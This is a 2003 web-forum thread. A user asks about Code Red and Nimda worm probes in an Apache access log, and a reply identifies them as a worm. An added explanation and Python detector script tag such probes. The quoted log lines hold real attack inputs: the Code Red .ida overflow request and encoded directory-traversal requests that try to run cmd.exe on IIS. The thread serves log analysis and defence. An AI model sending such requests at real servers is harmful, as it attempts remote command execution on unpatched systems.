#1
Senior Member (Devshed Newbie, Boston MA, joined Sep 2002)

Virus, Hacker or what?


    I keep getting this showing up in my access log. I am guessing it is some kind of script probing my machine for vulnerabilities?

    Anyone know for sure?
    Code:
68.83.51.194 - - [10/Sep/2003:11:11:10 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 404 1072 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:15 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:16 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:18 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:20 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:22 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:24 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:26 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:28 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:30 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:32 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:34 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:36 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:38 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 990 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:39 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 990 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:41 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
    68.80.96.56 - - [10/Sep/2003:13:01:43 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
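The two request shapes in the log above are the classic worm probe signatures of that era: a `GET /default.ida?XXX...%u9090...` request is the Code Red ISAPI `.ida` buffer-overflow probe, and the `root.exe` / `cmd.exe?/c+dir` requests with `..%255c..`, `..%c1%1c..`, `..%c0%af..` and similar traversal sequences are Nimda-style probes for an unpatched IIS (the double-encoded and overlong-UTF-8 forms exist to slip past single-pass path normalization). Every one of them got a 404 or 400 from this Apache server, which is the expected outcome on a host that does not run IIS. The script below is an added example, not code from the thread: it parses Apache common/combined log lines, percent-decodes the request target twice so `%255c` becomes `%5c` and then `\`, tags each request with the signature it matches, and tallies hits per source address so you can see at a glance which IPs are scanning you. The sample log is constructed for the example (the two scanner IPs are taken from the post, the benign `198.51.100.7` line is made up), and the signature names are this example's own labels.

```python
"""Tag Code Red / Nimda style probes in an Apache access log (added example)."""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample, modelled on the lines in the post above (targets shortened).
# The last line is a made-up benign request so the scan has something to ignore.
SAMPLE_LOG = """\
68.83.51.194 - - [10/Sep/2003:11:11:10 -0400] "GET /default.ida?XXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 1072 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:15 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:22 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
68.80.96.56 - - [10/Sep/2003:13:01:30 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1057 "-" "-"
198.51.100.7 - - [10/Sep/2003:13:05:00 -0400] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache common/combined log format: ip ident user [timestamp] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]*))?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def normalize(target):
    """Lower-case and percent-decode the target twice.

    One pass turns '..%255c..' into '..%5c..'; the second turns that into '..\\..'.
    '%%35%63' decodes to '%5c' on the first pass for the same reason.
    Invalid UTF-8 such as the overlong '%c1%1c' is replaced, not raised.
    """
    t = target.lower()
    for _ in range(2):
        t = unquote(t, errors="replace")
    return t


def classify(target):
    """Map a request target to a signature label, or None for unremarkable requests."""
    raw = target.lower()
    dec = normalize(target)
    # Code Red: ISAPI .ida handler hit with a long filler and %u-encoded payload.
    if "/default.ida" in raw and "%u" in raw:
        return "code-red-ida-overflow"
    # Nimda and friends: reach a shell binary, usually via a traversal sequence.
    if "cmd.exe" in dec or "root.exe" in dec:
        if ".." in dec:
            return "nimda-traversal-cmd"
        return "nimda-cmd-probe"
    return None


def scan(log_text):
    """Tally matched signatures per source IP: {ip: Counter({signature: hits})}."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        sig = classify(rec["target"])
        if sig:
            hits[rec["ip"]][sig] += 1
    return hits


if __name__ == "__main__":
    for ip, sigs in scan(SAMPLE_LOG).items():
        print(ip, dict(sigs))
```

Run it against a real `access_log` by replacing `SAMPLE_LOG` with the file contents; a source that racks up a dozen `nimda-traversal-cmd` hits in a few seconds is an infected machine sweeping address space, not a person, and the useful response is to confirm your own server is not IIS (or is patched) and, if the noise matters, block the address at the firewall.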
#2
Contributing User (Devshed Newbie, joined Jan 2003)

Yes, it is indeed a worm, but I believe Apache is safe, and so are patched IIS.
